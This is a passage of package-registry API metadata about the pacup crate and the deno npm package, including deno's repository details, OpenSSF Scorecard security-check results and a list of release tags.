cosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacup/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacup/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacup/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacup/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacup/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacup/codemeta","maintainers":[{"uuid":"193057","login":"TylerJerme","name":null,"email":null,"url":"https://github.com/TylerJerme","packages_count":4,"html_url":"https://crates.io/users/TylerJerme","role":null,"created_at":"2023-01-11T08:26:39.427Z","updated_at":"2023-01-11T08:26:39.427Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/TylerJerme/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":1607766,"name":"deno","ecosystem":"npm","description":"A modern runtime for JavaScript and TypeScript.","homepage":"https://deno.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":["runtime","typescript"],"namespace":null,"versions_count":104,"first_release_published_at":"2018-05-31T07:10:15.467Z","latest_release_published_at":"2026-08-27T17:36:36.711Z","latest_release_number":"2.9.6","last_synced_at":"2026-08-29T21:57:33.131Z","created_at":"2022-04-09T11:36:30.830Z","updated_at":"2026-08-31T03:03:26.846Z","registry_url":"https://www.npmjs.com/package/deno","install_command":"npm install deno","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"lts":"2.2.15","latest":"2.9.6"},"contentPolicy":null},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.